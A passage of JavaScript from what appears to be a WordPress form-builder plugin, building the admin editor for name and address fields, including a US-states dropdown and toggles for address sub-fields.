	}
	
	document.getElementById(id+'_range_'+type+'form_id_temp').value=s;
}
function explode( delimiter, string ) {	
	var emptyArray = { 0: '' };

	if ( arguments.length != 2	|| typeof arguments[0] == 'undefined'	|| typeof arguments[1] == 'undefined' )
	{
		return null;
	}

	if ( delimiter === '' || delimiter === false	|| delimiter === null )
	{
		return false;
	}

	if ( typeof delimiter == 'function'	|| typeof delimiter == 'object'	|| typeof string == 'function'	|| typeof string == 'object' )
	{
		return emptyArray;
	}

	if ( delimiter === true ) {
		delimiter = '1';
	}

	return string.toString().split ( delimiter.toString() );
}


function type_name(i, w_field_label, w_field_label_size, w_field_label_pos, w_first_val, w_title, w_mini_labels, w_size, w_name_format, w_required, w_unique, w_class, w_attr_name, w_attr_value, w_name_fields) {
	
	document.getElementById("element_type").value="type_name";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
		edit_main_tr3.style.cssText = "display:none";
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
	var edit_main_tr11  = document.createElement('tr');
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
			
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";

if(w_field_label_pos == "top")
	el_label_position2.setAttribute("checked", "checked");
else
	el_label_position1.setAttribute("checked", "checked");

	var gic = document.createTextNode("-");

	var el_first_value_label = document.createElement('label');
		el_first_value_label.setAttribute("class", "fm-field-label");
	    el_first_value_label.setAttribute("for", "el_first_value_input");
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_first = document.createElement('input');
		el_first_value_first.setAttribute("id", "el_first_value_first");
		el_first_value_first.setAttribute("type", "text");
		el_first_value_first.setAttribute("value", w_title[0]);
		el_first_value_first.style.cssText = "width:96px;";
		el_first_value_first.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_firstform_id_temp')");

	var el_first_value_last = document.createElement('input');
		el_first_value_last.setAttribute("id", "el_first_value_last");
		el_first_value_last.setAttribute("type", "text");
		el_first_value_last.setAttribute("value", w_title[1]);
		el_first_value_last.style.cssText = "width:96px;";
		el_first_value_last.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_lastform_id_temp')");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
		el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		el_size.setAttribute("id", "edit_for_input_size");
		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_element_firstform_id_temp', this.value); change_w_style('"+i+"_element_lastform_id_temp', this.value); change_w_style('"+i+"_element_middleform_id_temp', this.value)");

	var el_format_label = document.createElement('label');
		el_format_label.setAttribute("class", "fm-field-label");
		el_format_label.setAttribute("for", "el_format_normal");
		el_format_label.innerHTML = "Name Format";
	
	var el_format_normal = document.createElement('input');
		el_format_normal.setAttribute("id", "el_format_normal");
		el_format_normal.setAttribute("type", "radio");
		el_format_normal.setAttribute("value", "normal");
		el_format_normal.setAttribute("name", "edit_for_name_format");
		el_format_normal.setAttribute("onchange", "format_normal("+i+")");
		el_format_normal.setAttribute("checked", "checked");
		Normal = document.createTextNode("Normal");
		
	var el_format_extended = document.createElement('input');
		el_format_extended.setAttribute("id", "el_format_extended");
		el_format_extended.setAttribute("type", "radio");
		el_format_extended.setAttribute("value", "extended");
		el_format_extended.setAttribute("name", "edit_for_name_format");
		el_format_extended.setAttribute("onchange", "format_extended("+i+",'','','','')");
		Extended = document.createTextNode("Extended");
		
	if(w_name_format=="normal")
		el_format_normal.setAttribute("checked", "checked");
	else
		el_format_extended.setAttribute("checked", "checked");

	////////////////////////////////////////////////////////////////////////////////
	/////////////////////////////////////////////////////////////////////////////////////////	

	var el_enable_field_label = document.createElement('label');
		el_enable_field_label.setAttribute("class", "fm-field-label");
		el_enable_field_label.setAttribute("for", "el_title");
		el_enable_field_label.innerHTML = "Enable Field(s)";
	
	var el_enable_title = document.createElement('input');
		el_enable_title.setAttribute("id", "el_title");
		el_enable_title.setAttribute("type", "checkbox");
		el_enable_title.setAttribute("value", "no");
		el_enable_title.setAttribute("onclick", "enable_name_fields('"+i+"','title')");
		if(w_name_fields[0]=="yes")
			el_enable_title.setAttribute("checked", "checked");	

	var el_enable_middle = document.createElement('input');
		el_enable_middle.setAttribute("id", "el_middle");
		el_enable_middle.setAttribute("type", "checkbox");
		el_enable_middle.setAttribute("value", "no");
		el_enable_middle.setAttribute("onclick", "enable_name_fields('"+i+"','middle')");
		if(w_name_fields[1]=="yes")
			el_enable_middle.setAttribute("checked", "checked");	

	var el_title = document.createTextNode(w_mini_labels[0]);
	var el_first = document.createTextNode(w_mini_labels[1]);
	var el_last = document.createTextNode(w_mini_labels[2]);
	var el_middle = document.createTextNode(w_mini_labels[3]);

	var el_title_label = document.createElement('label');
		el_title_label.setAttribute("id", "el_title_label");
		el_title_label.setAttribute("for", "el_title");
	
	var el_first_label = document.createElement('label');
		el_first_label.setAttribute("id", "el_first_label");
		el_first_label.setAttribute("for", "el_first");
	
	var el_last_label = document.createElement('label');
		el_last_label.setAttribute("id", "el_last_label");
		el_last_label.setAttribute("for", "el_last");
		
	var el_middle_label = document.createElement('label');
		el_middle_label.setAttribute("id", "el_middle_label");		
		el_middle_label.setAttribute("for", "el_middle");	
	////////////////////////////////////////////////////////////////////////	
	//////////////////////////////////////////////////////////////////	
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");	

	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
	    el_unique_label.setAttribute("for", "el_unique");
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
		el_unique.setAttribute("id", "el_unique");
		el_unique.setAttribute("type", "checkbox");
		el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
		if(w_unique=="yes")
			el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_name')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_name')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_name')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
		el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_name')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td9.appendChild(el_first_value_label);
	edit_main_td9_1.appendChild(el_first_value_first);
	edit_main_td9_1.appendChild(gic);
	edit_main_td9_1.appendChild(el_first_value_last);
	
	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);
	
	edit_main_td3.appendChild(el_format_label);
	edit_main_td3_1.appendChild(el_format_normal);
	edit_main_td3_1.appendChild(Normal);
	edit_main_td3_1.appendChild(br1);
	edit_main_td3_1.appendChild(el_format_extended);
	edit_main_td3_1.appendChild(Extended);
	
///////////////////////////////////////
/////////////////////////////////////////	
	el_title_label.appendChild(el_title);
	el_first_label.appendChild(el_first);
	el_last_label.appendChild(el_last);
	el_middle_label.appendChild(el_middle);
	
	edit_main_td11.appendChild(el_enable_field_label);
	edit_main_td11_1.appendChild(el_enable_title);
	edit_main_td11_1.appendChild(el_title_label);
	edit_main_td11_1.appendChild(br3);
	edit_main_td11_1.appendChild(el_enable_middle);
	edit_main_td11_1.appendChild(el_middle_label);
	edit_main_td11_1.appendChild(br6);

///////////////////////////////////////////////	
////////////////////////////////////////////////	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br2);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_name');
//show table

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_name");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
	
	var adding_fields = document.createElement("input");
		adding_fields.setAttribute("type", "hidden");
		adding_fields.setAttribute("name", i+"_enable_fieldsform_id_temp");
		adding_fields.setAttribute("id", i+"_enable_fieldsform_id_temp");	
		adding_fields.setAttribute("title", w_name_fields[0]);
		adding_fields.setAttribute("first", 'yes');
		adding_fields.setAttribute("last", 'yes');
		adding_fields.setAttribute("middle", w_name_fields[1]);

	var adding_unique= document.createElement("input");
		adding_unique.setAttribute("type", "hidden");
		adding_unique.setAttribute("value", w_unique);
		adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
		adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
	
    edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
	var div_for_editable_labels = document.createElement('div');
		div_for_editable_labels.setAttribute("class", "fm-editable-label");
		div_for_editable_labels.appendChild(edit_labels);  

	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size +"px";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var table_name = document.createElement('div');
		table_name.style.display="table";
		table_name.setAttribute("id", i+"_table_name");
		table_name.setAttribute("cellpadding", '0');
		table_name.setAttribute("cellspacing", '0');
		
	var tr_name1 = document.createElement('div');
		tr_name1.style.display="table-row";
		tr_name1.setAttribute("id", i+"_tr_name1");
		
	var tr_name2 = document.createElement('div');
		tr_name2.style.display="table-row";
		tr_name2.setAttribute("id", i+"_tr_name2");
		
	var td_name_input1 = document.createElement('div');
		td_name_input1.style.display="table-cell";
		td_name_input1.setAttribute("id", i+"_td_name_input_first");
		
	var td_name_input2 = document.createElement('div');
		td_name_input2.style.display="table-cell";
		td_name_input2.setAttribute("id", i+"_td_name_input_last");
	
	var td_name_label1 = document.createElement('div');
		td_name_label1.style.display="table-cell";
		td_name_label1.setAttribute("id", i+"_td_name_label_first");
		td_name_label1.setAttribute("align", "left");
		
	var td_name_label2 = document.createElement('div');
		td_name_label2.style.display="table-cell";
		td_name_label2.setAttribute("id", i+"_td_name_label_last");
		td_name_label2.setAttribute("align", "left");
	
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		label.style.verticalAlign="top";
		
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		required.style.verticalAlign="top";
		if(w_required=="yes")
			required.innerHTML = " *";		
			
	var first = document.createElement('input');
		first.setAttribute("type", 'text');
		if(w_title[0]==w_first_val[0])
			first.setAttribute("class", "input_deactive");
		else
			first.setAttribute("class", "input_active");
	    first.style.cssText = "margin-right: 10px; width:"+w_size+"px";
	    first.setAttribute("id", i+"_element_firstform_id_temp");
	    first.setAttribute("name", i+"_element_firstform_id_temp");
		first.setAttribute("value", w_first_val[0]);
		first.setAttribute("title", w_title[0]);
		first.setAttribute("onFocus", 'delete_value("'+i+'_element_firstform_id_temp")');
		first.setAttribute("onBlur", 'return_value("'+i+'_element_firstform_id_temp")');
	    first.setAttribute("onChange", "change_value('"+i+"_element_firstform_id_temp')");
			
	var first_label = document.createElement('label');
	    first_label.setAttribute("class", "mini_label");
	    first_label.setAttribute("id", i+"_mini_label_first");
	    first_label.innerHTML= w_mini_labels[1];
			
	var last = document.createElement('input');
        last.setAttribute("type", 'text');
		if(w_title[1]==w_first_val[1])
			last.setAttribute("class", "input_deactive");
		else
			last.setAttribute("class", "input_active");
		last.style.cssText = "margin-right: 10px; width:"+w_size+"px";
		last.setAttribute("id", i+"_element_lastform_id_temp");
		last.setAttribute("name", i+"_element_lastform_id_temp");
		last.setAttribute("value", w_first_val[1]);
		last.setAttribute("title", w_title[1]);
		last.setAttribute("onFocus", 'delete_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onBlur", 'return_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onChange", "change_value('"+i+"_element_lastform_id_temp')");

	var last_label = document.createElement('label');
		last_label.setAttribute("class", "mini_label");
		last_label.setAttribute("id", i+"_mini_label_last");
		last_label.innerHTML= w_mini_labels[2];
			
    var main_td  = document.getElementById('show_table');
      
	div_label.appendChild(label);
	div_label.appendChild(required );
	
	td_name_input1.appendChild(first);
	td_name_input2.appendChild(last);
	tr_name1.appendChild(td_name_input1);
	tr_name1.appendChild(td_name_input2);
	
	td_name_label1.appendChild(first_label);
	td_name_label2.appendChild(last_label);
	tr_name2.appendChild(td_name_label1);
	tr_name2.appendChild(td_name_label2);
	table_name.appendChild(tr_name1);
	table_name.appendChild(tr_name2);

	
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_unique);
	div_element.appendChild(adding_fields);
	div_element.appendChild(table_name);
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br8);
	div.appendChild(div_for_editable_labels);
	main_td.appendChild(div);
		
	if(w_field_label_pos=="top")
		label_top(i);
	
//	if(w_name_format=="extended")
//		format_extended(i,w_first_val[2],w_first_val[3],w_title[2],w_title[3]);

	change_class(w_class, i);
	if(w_name_fields[0] == 'yes')
		enable_name_fields(i, 'title');
		
	if(w_name_fields[1] == 'yes')
		enable_name_fields(i, 'middle');	
		
	jQuery(document).ready(function() {	
		jQuery("label#"+i+"_mini_label_first").click(function() {		
			if (jQuery(this).children('input').length == 0) {				
				var first = "<input type='text' class='first' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(first);							
				jQuery("input.first").focus();			
				jQuery("input.first").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_first").text(value);	
					document.getElementById('el_first_label').innerHTML = value;						
				});	
			}	
		});		

		jQuery("label#"+i+"_mini_label_last").click(function() {	
			if (jQuery(this).children('input').length == 0) {		
				var last = "<input type='text' class='last'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(last);			
				jQuery("input.last").focus();					
				jQuery("input.last").blur(function() {			
					var value = jQuery(this).val();			
					jQuery("#"+i+"_mini_label_last").text(value);	
					document.getElementById('el_last_label').innerHTML = value;	
				});	
			}	
		});
	});	

	refresh_attr(i, 'type_name');
	refresh_id_name(i, 'type_name');
}

function go_to_type_address(new_id)
{
 	w_attr_name = [];
 	w_attr_value = [];
	w_mini_labels = ['Street Address', 'Street Address Line 2', 'City', 'State / Province / Region', 'Postal / Zip Code', 'Country',];
	w_disabled_fields = ['no', 'no', 'no', 'no', 'no', 'no', 'no'];
	type_address(new_id, 'Address:', '100', 'left', '300', w_mini_labels, w_disabled_fields, 'no', 'wdform_address', w_attr_name, w_attr_value)
}

function change_state_input(id,form_id)
{
	if((document.getElementById(id+"_country"+form_id) && document.getElementById(id+"_country"+form_id).value=="United States" && document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute('us_states')=='yes') || (document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute('country')=='yes' && document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute('us_states')=='yes'))
	{	

		state_input=document.getElementById(id+"_state"+form_id);
		
		
		var state = document.createElement('select');
			state.setAttribute("type", 'text');
			state.style.cssText = "width:100%";
			state.setAttribute("id", id+"_state"+form_id);
			state.setAttribute("name", (parseInt(id)+3)+"_state"+form_id);
			state.setAttribute("onChange", "change_value('"+id+"_state"+form_id+"')");

	
		
		var option_ = document.createElement('option');
			option_.setAttribute("value", "");
			option_.innerHTML="";
		state.appendChild(option_);
		
		states=["Alabama","Alaska", "Arizona","Arkansas","California","Colorado","Connecticut","Delaware","District Of Columbia","Florida","Georgia","Hawaii","Idaho","Illinois","Indiana","Iowa","Kansas","Kentucky","Louisiana","Maine","Maryland","Massachusetts","Michigan","Minnesota","Mississippi","Missouri","Montana","Nebraska","Nevada","New Hampshire","New Jersey","New Mexico","New York","North Carolina","North Dakota","Ohio","Oklahoma","Oregon","Pennsylvania","Rhode Island","South Carolina","South Dakota","Tennessee","Texas","Utah","Vermont","Virginia","Washington","West Virginia","Wisconsin","Wyoming"];	
		for(r=0;r<states.length;r++)
		{
		var option_ = document.createElement('option');
			option_.setAttribute("value", states[r]);
			option_.innerHTML=states[r];
		state.appendChild(option_);
		}
		
		var state_input_parent = state_input.parentNode;
		state_input_parent.removeChild(state_input);
		state_input_parent.insertBefore(state,state_input_parent.firstChild);

	}
	else
	{

		if(document.getElementById(id+"_state"+form_id).tagName=='SELECT')
		{
				
				var state_input = document.createElement('input');
					state_input.setAttribute("type", 'text');
					state_input.style.cssText = "width:100%";
					state_input.setAttribute("id", id+"_state"+form_id);
					state_input.setAttribute("name", (parseInt(id)+3)+"_state"+form_id);
					state_input.setAttribute("onChange", "change_value('"+id+"_state"+form_id+"')");
									
					
					state = document.getElementById(id+"_state"+form_id);
					
					var state_parent = state.parentNode;
						state_parent.removeChild(state);
						state_parent.insertBefore(state_input,state_parent.firstChild);
					
		}
	
	}


}

function disable_fields(id,field)
{	
	var div = document.getElementById(id+"_div_address");	
	if(field)
	{
		if(document.getElementById("el_"+field).checked == true)
			document.getElementById(id+"_disable_fieldsform_id_temp").setAttribute(field, "yes");
		else
			document.getElementById(id+"_disable_fieldsform_id_temp").setAttribute(field, "no");
	}

	if(document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute("state") == 'yes')
		document.getElementById("el_us_states").disabled = true;
	else
	{
		document.getElementById("el_us_states").disabled = false;
		if(field == 'us_states')
		{		
			change_state_input(id,'form_id_temp');
			return;
		}
	}
	
	div.innerHTML = '';
	var hidden_labels = new Array();
	var address_fields = ['street1','street2','city','state','postal','country'];
	var left_right = 0;
		
	for(l=0; l<6; l++)
	{
		if(document.getElementById(id+'_disable_fieldsform_id_temp').getAttribute(address_fields[l]) == 'no')	
		{
			if(address_fields[l]=='street1' || address_fields[l]=='street2')    
			{  
				var street = document.createElement('input');
					street.setAttribute("type", 'text');
					street.style.cssText = "width:100%";
					street.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
					street.setAttribute("name", (parseInt(id)+l)+"_"+address_fields[l]+"form_id_temp");
					street.setAttribute("onChange", "change_value('"+id+"_"+address_fields[l]+"form_id_temp')");
						
				var street_label = document.createElement('label');
					street_label.setAttribute("class", "mini_label");	
					street_label.setAttribute("id", id+"_mini_label_"+address_fields[l]);
					street_label.style.cssText = "display:block;";
					street_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
					w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
					
				var span_addres = document.createElement('span');
					span_addres.style.cssText = "float:left; width:100%; padding-bottom: 8px; display:block";	
				
				span_addres.appendChild(street);
				span_addres.appendChild(street_label);
				div.appendChild(span_addres);					
			}	
			else
			{
				left_right++;
				if(address_fields[l]!='country')
				{
					var field = document.createElement('input');
						field.setAttribute("type", 'text');
						field.style.cssText = "width:100%";
						field.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
						field.setAttribute("name", (parseInt(id)+l)+"_"+address_fields[l]+"form_id_temp");
						field.setAttribute("onChange", "change_value('"+id+"_"+address_fields[l]+"form_id_temp')");

					var field_label = document.createElement('label');
						field_label.setAttribute("class", "mini_label");		
						field_label.setAttribute("id", id+"_mini_label_"+address_fields[l]);
						field_label.style.cssText = "display:block;";
						field_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
